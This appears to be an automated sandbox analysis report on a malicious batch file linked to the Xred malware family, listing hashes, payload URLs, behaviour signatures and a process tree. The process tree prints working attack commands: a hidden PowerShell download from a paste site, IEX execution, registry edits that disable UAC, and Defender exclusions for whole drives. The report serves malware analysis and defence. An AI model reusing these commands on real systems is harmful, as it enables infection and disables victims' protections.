Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-12-2024 10:31
Static task
static1
Behavioral task
behavioral1
Sample
NEW-DRAWING-SHEET.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
NEW-DRAWING-SHEET.bat
Resource
win10v2004-20241007-en
General
-
Target
NEW-DRAWING-SHEET.bat
-
Size
41KB
-
MD5
6b9cf24f2b691606642bd18bf2227a62
-
SHA1
046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
-
SHA256
f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
-
SHA512
db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e
-
SSDEEP
768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO
Malware Config
Extracted
https://paste.fo/raw/a1af5a4d0301
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe -
Xred family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 2208 powershell.exe -
pid Process 3972 powershell.exe 2208 powershell.exe 3028 powershell.exe 2476 powershell.exe 1520 powershell.exe 4572 powershell.exe 3428 powershell.exe 4552 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation DOC.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Synaptics.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MRIYKG.lnk ._cache_DOC.exe -
Executes dropped EXE 7 IoCs
pid Process 2080 DOC.exe 4032 ._cache_DOC.exe 4840 Synaptics.exe 4940 ._cache_Synaptics.exe 1016 CHVALO.exe 4304 CHVALO.exe 3376 CHVALO.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" DOC.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MRIYKG = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\CHVALO.exe\"" ._cache_DOC.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 18 raw.githubusercontent.com 21 raw.githubusercontent.com -
AutoIT Executable 17 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/4940-365-0x00000000006D0000-0x00000000008D4000-memory.dmp autoit_exe behavioral2/memory/4940-369-0x00000000006D0000-0x00000000008D4000-memory.dmp autoit_exe behavioral2/memory/1016-429-0x0000000000CD0000-0x0000000000ED4000-memory.dmp autoit_exe behavioral2/memory/4032-430-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-431-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-436-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-438-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-440-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-442-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-446-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4304-468-0x0000000000CD0000-0x0000000000ED4000-memory.dmp autoit_exe behavioral2/memory/4032-471-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-473-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-475-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-479-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/4032-481-0x0000000000D20000-0x0000000000F24000-memory.dmp autoit_exe behavioral2/memory/3376-484-0x0000000000CD0000-0x0000000000ED4000-memory.dmp autoit_exe -
resource yara_rule behavioral2/files/0x0007000000023cfc-179.dat upx behavioral2/memory/4032-244-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4940-365-0x00000000006D0000-0x00000000008D4000-memory.dmp upx behavioral2/memory/4940-369-0x00000000006D0000-0x00000000008D4000-memory.dmp upx behavioral2/memory/1016-427-0x0000000000CD0000-0x0000000000ED4000-memory.dmp upx behavioral2/memory/1016-429-0x0000000000CD0000-0x0000000000ED4000-memory.dmp upx behavioral2/memory/4032-430-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-431-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-436-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-438-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-440-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-442-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-446-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4304-468-0x0000000000CD0000-0x0000000000ED4000-memory.dmp upx behavioral2/memory/4032-471-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-473-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-475-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-479-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/4032-481-0x0000000000D20000-0x0000000000F24000-memory.dmp upx behavioral2/memory/3376-484-0x0000000000CD0000-0x0000000000ED4000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WSCript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CHVALO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CHVALO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CHVALO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_DOC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 3224 timeout.exe 4944 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 12 IoCs
pid Process 1712 taskkill.exe 2196 taskkill.exe 2896 taskkill.exe 1708 taskkill.exe 1244 taskkill.exe 2856 taskkill.exe 2628 taskkill.exe 4944 taskkill.exe 1704 taskkill.exe 1744 taskkill.exe 3324 taskkill.exe 4380 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ DOC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe -
Modifies registry key 1 TTPs 12 IoCs
pid Process 3640 reg.exe 3048 reg.exe 4832 reg.exe 4260 reg.exe 4824 reg.exe 3116 reg.exe 112 reg.exe 3920 reg.exe 4044 reg.exe 4484 reg.exe 4764 reg.exe 3700 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\root\SecurityCenter2 ._cache_DOC.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3156 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3244 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2208 powershell.exe 2208 powershell.exe 3972 powershell.exe 3972 powershell.exe 3028 powershell.exe 3028 powershell.exe 2476 powershell.exe 2476 powershell.exe 1520 powershell.exe 1520 powershell.exe 4452 msedge.exe 4452 msedge.exe 2908 msedge.exe 2908 msedge.exe 4572 powershell.exe 4572 powershell.exe 4572 powershell.exe 3428 powershell.exe 3428 powershell.exe 3428 powershell.exe 4552 powershell.exe 4552 powershell.exe 4552 powershell.exe 1520 identity_helper.exe 1520 identity_helper.exe 4272 msedge.exe 4272 msedge.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe 4032 ._cache_DOC.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4032 ._cache_DOC.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2208 powershell.exe Token: SeDebugPrivilege 3972 powershell.exe Token: SeDebugPrivilege 3028 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeDebugPrivilege 3428 powershell.exe Token: SeDebugPrivilege 4552 powershell.exe Token: SeRestorePrivilege 1496 7z.exe Token: 35 1496 7z.exe Token: SeSecurityPrivilege 1496 7z.exe Token: SeSecurityPrivilege 1496 7z.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 1704 taskkill.exe Token: SeDebugPrivilege 1744 taskkill.exe Token: SeDebugPrivilege 3324 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe Token: SeDebugPrivilege 2856 taskkill.exe Token: SeDebugPrivilege 2628 taskkill.exe Token: SeDebugPrivilege 1712 taskkill.exe Token: SeDebugPrivilege 4380 taskkill.exe Token: SeDebugPrivilege 2196 taskkill.exe Token: SeDebugPrivilege 4944 taskkill.exe Token: SeDebugPrivilege 2896 taskkill.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe 2908 msedge.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE 3244 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4028 wrote to memory of 4864 4028 cmd.exe 84 PID 4028 wrote to memory of 4864 4028 cmd.exe 84 PID 4864 wrote to memory of 2208 4864 cmd.exe 86 PID 4864 wrote to memory of 2208 4864 cmd.exe 86 PID 4864 wrote to memory of 3972 4864 cmd.exe 87 PID 4864 wrote to memory of 3972 4864 cmd.exe 87 PID 3972 wrote to memory of 2288 3972 powershell.exe 88 PID 3972 wrote to memory of 2288 3972 powershell.exe 88 PID 2288 wrote to memory of 3700 2288 cmd.exe 90 PID 2288 wrote to memory of 3700 2288 cmd.exe 90 PID 2288 wrote to memory of 4764 2288 cmd.exe 91 PID 2288 wrote to memory of 4764 2288 cmd.exe 91 PID 2288 wrote to memory of 4484 2288 cmd.exe 92 PID 2288 wrote to memory of 4484 2288 cmd.exe 92 PID 2288 wrote to memory of 3116 2288 cmd.exe 93 PID 2288 wrote to memory of 3116 2288 cmd.exe 93 PID 2288 wrote to memory of 4824 2288 cmd.exe 94 PID 2288 wrote to memory of 4824 2288 cmd.exe 94 PID 2288 wrote to memory of 3640 2288 cmd.exe 95 PID 2288 wrote to memory of 3640 2288 cmd.exe 95 PID 2288 wrote to memory of 4044 2288 cmd.exe 96 PID 2288 wrote to memory of 4044 2288 cmd.exe 96 PID 2288 wrote to memory of 3920 2288 cmd.exe 97 PID 2288 wrote to memory of 3920 2288 cmd.exe 97 PID 2288 wrote to memory of 3048 2288 cmd.exe 98 PID 2288 wrote to memory of 3048 2288 cmd.exe 98 PID 2288 wrote to memory of 4260 2288 cmd.exe 99 PID 2288 wrote to memory of 4260 2288 cmd.exe 99 PID 2288 wrote to memory of 4832 2288 cmd.exe 100 PID 2288 wrote to memory of 4832 2288 cmd.exe 100 PID 2288 wrote to memory of 112 2288 cmd.exe 101 PID 2288 wrote to memory of 112 2288 cmd.exe 101 PID 2288 wrote to memory of 3028 2288 cmd.exe 102 PID 2288 wrote to memory of 3028 2288 cmd.exe 102 PID 2288 wrote to memory of 2476 2288 cmd.exe 103 PID 2288 wrote to memory of 2476 2288 cmd.exe 103 PID 4864 wrote to memory of 2908 4864 cmd.exe 104 PID 4864 wrote to memory of 2908 4864 cmd.exe 104 PID 4864 wrote to memory of 3224 4864 cmd.exe 106 PID 4864 wrote to memory of 3224 4864 cmd.exe 106 PID 2908 wrote to memory of 2072 2908 msedge.exe 107 PID 2908 wrote to memory of 2072 2908 msedge.exe 107 PID 2288 wrote to memory of 1520 2288 cmd.exe 126 PID 2288 wrote to memory of 1520 2288 cmd.exe 126 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109 PID 2908 wrote to memory of 3076 2908 msedge.exe 109
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat'))"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /4⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:3700
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f5⤵
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies registry key
PID:4764
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4484
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3116
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4824
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3640
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4044
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3920
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3048
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4260
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:4832
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffff7bb46f8,0x7ffff7bb4708,0x7ffff7bb47184⤵PID:2072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:24⤵PID:3076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:4452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:84⤵PID:4796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8998957763719388493,14349539681561883206,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:14⤵PID:4768
-
-
